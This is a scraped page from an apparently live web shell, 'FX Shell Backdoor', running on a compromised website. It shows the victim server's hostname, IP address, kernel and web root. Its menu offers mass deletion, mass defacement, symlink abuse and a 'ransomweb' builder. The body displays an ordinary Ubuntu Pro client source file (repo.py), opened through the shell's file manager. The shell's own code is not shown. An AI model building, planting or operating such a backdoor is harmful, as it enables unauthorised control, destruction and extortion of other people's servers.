FX Shell Backdoor
Home
Tools
Mass Delete
Mass Deface
Symlink
About
Website : vivehg.com
Ip Address : 172.31.2.149
Port : 443
Kernel : Linux 52-72-122-155.cprapid.com 5.15.0-1084-aws #91~20.04.1-Ubuntu SMP Fri May 2 06:59:36 UTC 2025 x86_64
Protokol : HTTP/1.1
Save Data :
Koneksi :
Server : Apache
Root : /home/vivehg/public_html
G-Interface : CGI/1.1
R-Method : GET
Browser : Lainnya
Version Shell : 1.0 (Release candidate)
Author : FierzaXploit/Mr.MF33
Type
Name
options
PATH :
/
lib
/
python3
/
dist-packages
/
uaclient
/
entitlements
/
Upload
Buat File
Buat Folder
Buat Ransomweb
import abc
import copy
import logging
import re
from os.path import exists
from typing import Any, Dict, List, Optional, Tuple, Union

from uaclient import (
    apt,
    contract,
    event_logger,
    exceptions,
    http,
    messages,
    system,
    util,
)
from uaclient.entitlements import base
from uaclient.entitlements.entitlement_status import ApplicationStatus

event = event_logger.get_event_logger()
LOG = logging.getLogger(util.replace_top_level_logger_name(__name__))


class RepoEntitlement(base.UAEntitlement):
    """Base class for entitlements that are delivered through an apt repo.

    Subclasses must provide ``repo_key_file`` and may override
    ``repo_pin_priority``, ``origin``, ``apt_noninteractive`` and
    ``check_packages_are_installed``.
    """

    repo_list_file_tmpl = "/etc/apt/sources.list.d/ubuntu-{name}.list"
    repo_pref_file_tmpl = "/etc/apt/preferences.d/ubuntu-{name}"
    repo_url_tmpl = "{}/ubuntu"

    # The repo Origin value for setting pinning
    origin = None  # type: Optional[str]

    # GH: #1084 call apt in noninteractive mode
    apt_noninteractive = False

    # Check if the requested packages are installed to inform if
    # the service is enabled or not
    check_packages_are_installed = False

    # Optional repo pin priority in subclass
    @property
    def repo_pin_priority(self) -> Union[int, str, None]:
        """Pin priority for the repo; None (the default) means no pinning."""
        return None

    @property
    def packages(self) -> List[str]:
        """debs to install on enablement

        Returns a shallow copy of the ``additionalPackages`` directive so
        that callers cannot mutate the entitlement configuration.
        """
        entitlement = self.entitlement_cfg.get("entitlement", {})
        if not entitlement:
            return []
        directives = entitlement.get("directives", {})
        return copy.copy(directives.get("additionalPackages", []))

    def _check_for_reboot(self) -> bool:
        """Check if system needs to be rebooted."""
        reboot_required = system.should_reboot(
            installed_pkgs=set(self.packages)
        )
        event.needs_reboot(reboot_required)
        return reboot_required

    @property
    @abc.abstractmethod
    def repo_key_file(self) -> str:
        """Name of the apt key file for this repo; set by subclasses."""
        pass

    def _perform_enable(self, silent: bool = False) -> bool:
        """Enable specific entitlement.

        Sets up the apt configuration and then, unless the service is being
        enabled in access-only mode, installs the entitlement packages.

        :param silent: forwarded to setup_apt_config to suppress its
            progress messages.

        @return: True once setup finishes; failures propagate as exceptions.
        @raises: UserFacingError on failure to install suggested packages
        """
        self.setup_apt_config(silent=silent)

        if self.supports_access_only and self.access_only:
            packages = self.packages
            packages_str = ": " + " ".join(packages) if packages else ""
            event.info("Skipping installing packages{}".format(packages_str))
            event.info(messages.ACCESS_ENABLED_TMPL.format(title=self.title))
        else:
            self.install_packages()
            event.info(messages.ENABLED_TMPL.format(title=self.title))
            self._check_for_reboot_msg(operation="install")
        return True

    def _perform_disable(self, silent: bool = False) -> bool:
        """Disable the entitlement by removing its apt configuration.

        Packages are removed first when the subclass defines a
        ``remove_packages`` method.

        :param silent: forwarded to remove_apt_config to suppress its
            progress messages.

        :return: Always True; failures propagate as exceptions.
        """
        if hasattr(self, "remove_packages"):
            self.remove_packages()
        self.remove_apt_config(silent=silent)
        return True

    def application_status(
        self,
    ) -> Tuple[ApplicationStatus, Optional[messages.NamedMessage]]:
        """Report whether the repo is currently active on this machine.

        The service is ENABLED when the repo URL shows up in the apt cache
        policy. When ``check_packages_are_installed`` is set, any missing
        entitlement package downgrades the result to DISABLED.

        :return: Tuple of the application status and an explanatory message.
        """
        current_status = (
            ApplicationStatus.DISABLED,
            messages.SERVICE_NOT_CONFIGURED.format(title=self.title),
        )

        entitlement_cfg = self.entitlement_cfg
        directives = entitlement_cfg.get("entitlement", {}).get(
            "directives", {}
        )
        repo_url = directives.get("aptURL")
        if not repo_url:
            return (
                ApplicationStatus.DISABLED,
                messages.NO_APT_URL_FOR_SERVICE.format(title=self.title),
            )

        policy = apt.get_apt_cache_policy(
            error_msg=messages.APT_POLICY_FAILED.msg
        )
        # The URL is data, not a pattern: escape it so that characters such
        # as "." or "+" are matched literally instead of as regex operators.
        url_pattern = re.escape(self.repo_url_tmpl.format(repo_url))
        if re.search(url_pattern, policy):
            current_status = (
                ApplicationStatus.ENABLED,
                messages.SERVICE_IS_ACTIVE.format(title=self.title),
            )

        if self.check_packages_are_installed:
            for package in self.packages:
                if not apt.is_installed(package):
                    return (
                        ApplicationStatus.DISABLED,
                        messages.SERVICE_DISABLED_MISSING_PACKAGE.format(
                            service=self.name, package=package
                        ),
                    )

        return current_status

    def _check_apt_url_is_applied(self, apt_url):
        """Check if the apt url is already applied on the apt sources file.

        :param apt_url: string containing the apt url to be used.

        :return: False if every line of the sources file is commented out
                 or if apt_url is not found in the file, meaning the apt
                 configuration must be regenerated. True if there is no
                 apt_url delta or if apt_url is already in the file.
        """
        apt_file = self.repo_list_file_tmpl.format(name=self.name)
        apt_file_content = system.load_file(apt_file)

        # If the apt file is commented out, we will assume that we need
        # to regenerate the apt file, regardless of the apt url delta
        if all(
            line.startswith("#")
            for line in apt_file_content.strip().split("\n")
        ):
            return False

        # If the file is not commented out and we don't have delta,
        # we will not do anything
        if not apt_url:
            return True

        # If the delta is already in the file, we won't reconfigure it
        # again
        return apt_url in apt_file_content

    def process_contract_deltas(
        self,
        orig_access: Dict[str, Any],
        deltas: Dict[str, Any],
        allow_enable: bool = False,
    ) -> bool:
        """Process any contract access deltas for this entitlement.

        :param orig_access: Dictionary containing the original
            resourceEntitlement access details.
        :param deltas: Dictionary which contains only the changed access keys
            and values.
        :param allow_enable: Boolean set True if allowed to perform the enable
            operation. When False, a message will be logged to inform the user
            about the recommended enabled service.

        :return: True when delta operations are processed; False when noop.
        """
        if super().process_contract_deltas(orig_access, deltas, allow_enable):
            return True  # Already processed parent class deltas

        delta_entitlement = deltas.get("entitlement", {})
        delta_directives = delta_entitlement.get("directives", {})
        delta_apt_url = delta_directives.get("aptURL")
        delta_packages = delta_directives.get("additionalPackages")
        status_cache = self.cfg.read_cache("status-cache")

        if delta_directives and status_cache:
            application_status = self._check_application_status_on_cache()
        else:
            application_status, _ = self.application_status()

        if application_status == ApplicationStatus.DISABLED:
            return False

        if not self._check_apt_url_is_applied(delta_apt_url):
            LOG.info(
                "Updating '%s' apt sources list on changed directives.",
                self.name,
            )

            orig_entitlement = orig_access.get("entitlement", {})
            old_url = orig_entitlement.get("directives", {}).get("aptURL")
            if old_url:
                # Remove original aptURL and auth and rewrite
                repo_filename = self.repo_list_file_tmpl.format(name=self.name)
                apt.remove_auth_apt_repo(repo_filename, old_url)

            self.remove_apt_config()
            self.setup_apt_config()

        if delta_packages:
            LOG.info(
                "Installing packages on changed directives: %s",
                ", ".join(delta_packages),
            )
            self.install_packages(package_list=delta_packages)

        return True

    def install_packages(
        self,
        package_list: Optional[List[str]] = None,
        cleanup_on_failure: bool = True,
        verbose: bool = True,
    ) -> None:
        """Install contract recommended packages for the entitlement.

        :param package_list: Optional package list to use instead of
            self.packages.
        :param cleanup_on_failure: Cleanup apt files if apt install fails.
        :param verbose: If true, print messages to stdout

        :raise UserFacingError: re-raised when the apt install command fails.
        """
        if not package_list:
            package_list = self.packages

        if not package_list:
            return

        msg_ops = self.messaging.get("pre_install", [])
        if not util.handle_message_operations(msg_ops):
            return

        if verbose:
            event.info("Installing {title} packages".format(title=self.title))

        if self.apt_noninteractive:
            override_env_vars = {"DEBIAN_FRONTEND": "noninteractive"}
            apt_options = [
                "--allow-downgrades",
                '-o Dpkg::Options::="--force-confdef"',
                '-o Dpkg::Options::="--force-confold"',
            ]
        else:
            override_env_vars = None
            apt_options = []

        msg = messages.ENABLED_FAILED.format(title=self.title)
        try:
            apt.run_apt_install_command(
                packages=package_list,
                apt_options=apt_options,
                error_msg=msg.msg,
                override_env_vars=override_env_vars,
            )
        except exceptions.UserFacingError:
            if cleanup_on_failure:
                self.remove_apt_config()
            raise

    def setup_apt_config(self, silent: bool = False) -> None:
        """Setup apt config based on the resourceToken and directives.
        Also sets up apt proxy if necessary.

        :param silent: If true, do not print progress messages.

        :raise UserFacingError: on failure to setup any aspect of this apt
           configuration
        """
        http_proxy = None  # type: Optional[str]
        https_proxy = None  # type: Optional[str]
        scope = None  # type: Optional[apt.AptProxyScope]
        # Global apt proxy settings take precedence over the uaclient-scoped
        # ones.
        if self.cfg.global_apt_http_proxy or self.cfg.global_apt_https_proxy:
            http_proxy = http.validate_proxy(
                "http",
                self.cfg.global_apt_http_proxy,
                http.PROXY_VALIDATION_APT_HTTP_URL,
            )
            https_proxy = http.validate_proxy(
                "https",
                self.cfg.global_apt_https_proxy,
                http.PROXY_VALIDATION_APT_HTTPS_URL,
            )
            scope = apt.AptProxyScope.GLOBAL
        elif self.cfg.ua_apt_http_proxy or self.cfg.ua_apt_https_proxy:
            http_proxy = http.validate_proxy(
                "http",
                self.cfg.ua_apt_http_proxy,
                http.PROXY_VALIDATION_APT_HTTP_URL,
            )
            https_proxy = http.validate_proxy(
                "https",
                self.cfg.ua_apt_https_proxy,
                http.PROXY_VALIDATION_APT_HTTPS_URL,
            )
            scope = apt.AptProxyScope.UACLIENT

        apt.setup_apt_proxy(
            http_proxy=http_proxy, https_proxy=https_proxy, proxy_scope=scope
        )
        repo_filename = self.repo_list_file_tmpl.format(name=self.name)
        resource_cfg = self.entitlement_cfg
        directives = resource_cfg["entitlement"].get("directives", {})
        obligations = resource_cfg["entitlement"].get("obligations", {})
        token = resource_cfg.get("resourceToken")
        if not token:
            machine_token = self.cfg.machine_token["machineToken"]
            if not obligations.get("enableByDefault"):
                # services that are not enableByDefault need to obtain specific
                # resource access for tokens. We want to refresh this every
                # enable call because it is not refreshed by `pro refresh`.
                client = contract.UAContractClient(self.cfg)
                machine_access = client.get_resource_machine_access(
                    machine_token, self.name
                )
                if machine_access:
                    token = machine_access.get("resourceToken")
            if not token:
                token = machine_token
                LOG.warning(
                    "No resourceToken present in contract for service %s."
                    " Using machine token as credentials",
                    self.title,
                )
        aptKey = directives.get("aptKey")
        if not aptKey:
            raise exceptions.UserFacingError(
                "Ubuntu Pro server provided no aptKey directive for"
                " {}.".format(self.name)
            )
        repo_url = directives.get("aptURL")
        if not repo_url:
            raise exceptions.MissingAptURLDirective(self.name)
        repo_suites = directives.get("suites")
        if not repo_suites:
            raise exceptions.UserFacingError(
                "Empty {} apt suites directive from {}".format(
                    self.name, self.cfg.contract_url
                )
            )
        if self.repo_pin_priority:
            if not self.origin:
                raise exceptions.UserFacingError(
                    "Cannot setup apt pin. Empty apt repo origin value '{}'.\n"
                    "{}".format(
                        self.origin,
                        messages.ENABLED_FAILED.format(title=self.title).msg,
                    )
                )
            repo_pref_file = self.repo_pref_file_tmpl.format(name=self.name)
            apt.add_ppa_pinning(
                repo_pref_file,
                repo_url,
                self.origin,
                self.repo_pin_priority,
            )

        prerequisite_pkgs = []
        if not exists(apt.APT_METHOD_HTTPS_FILE):
            prerequisite_pkgs.append("apt-transport-https")
        if not exists(apt.CA_CERTIFICATES_FILE):
            prerequisite_pkgs.append("ca-certificates")

        if prerequisite_pkgs:
            if not silent:
                event.info(
                    "Installing prerequisites: {}".format(
                        ", ".join(prerequisite_pkgs)
                    )
                )
            try:
                apt.run_apt_install_command(packages=prerequisite_pkgs)
            except exceptions.UserFacingError:
                self.remove_apt_config()
                raise
        apt.add_auth_apt_repo(
            repo_filename,
            self.repo_url_tmpl.format(repo_url),
            token,
            repo_suites,
            self.repo_key_file,
        )
        # Run apt-update on any repo-entitlement enable because the machine
        # probably wants access to the repo that was just enabled.
        # Side-effect is that apt policy will now report the repo as accessible
        # which allows pro status to report correct info
        if not silent:
            event.info(messages.APT_UPDATING_LISTS)
        try:
            apt.run_apt_update_command()
        except exceptions.UserFacingError:
            # Skip the apt update on cleanup: it is the step that just failed.
            self.remove_apt_config(run_apt_update=False)
            raise

    def remove_apt_config(
        self, run_apt_update: bool = True, silent: bool = False
    ):
        """Remove any repository apt configuration files.

        :param run_apt_update: If True, run the apt update command after
            removing the apt files.
        :param silent: If True, do not print the "updating lists" message
            before running apt update.

        :raise MissingAptURLDirective: when the machine token entitlement
            has no aptURL directive.
        """
        series = system.get_release_info().series
        repo_filename = self.repo_list_file_tmpl.format(name=self.name)
        entitlement = self.cfg.machine_token_file.entitlements[self.name].get(
            "entitlement", {}
        )
        access_directives = entitlement.get("directives", {})
        repo_url = access_directives.get("aptURL")
        if not repo_url:
            raise exceptions.MissingAptURLDirective(self.name)

        apt.remove_auth_apt_repo(repo_filename, repo_url, self.repo_key_file)
        apt.remove_apt_list_files(repo_url, series)

        if self.repo_pin_priority:
            repo_pref_file = self.repo_pref_file_tmpl.format(name=self.name)
            system.ensure_file_absent(repo_pref_file)

        if run_apt_update:
            if not silent:
                event.info(messages.APT_UPDATING_LISTS)
            apt.run_apt_update_command()
__pycache__
Choose...
Rename
Delete
Now
__init__.py
Choose...
Edit
Rename
Delete
Now
__pycache__
Choose...
Edit
Rename
Delete
Now
anbox.py
Choose...
Edit
Rename
Delete
Now
base.py
Choose...
Edit
Rename
Delete
Now
cc.py
Choose...
Edit
Rename
Delete
Now
cis.py
Choose...
Edit
Rename
Delete
Now
entitlement_status.py
Choose...
Edit
Rename
Delete
Now
esm.py
Choose...
Edit
Rename
Delete
Now
fips.py
Choose...
Edit
Rename
Delete
Now
landscape.py
Choose...
Edit
Rename
Delete
Now
livepatch.py
Choose...
Edit
Rename
Delete
Now
realtime.py
Choose...
Edit
Rename
Delete
Now
repo.py
Choose...
Edit
Rename
Delete
Now
ros.py
Choose...
Edit
Rename
Delete
Now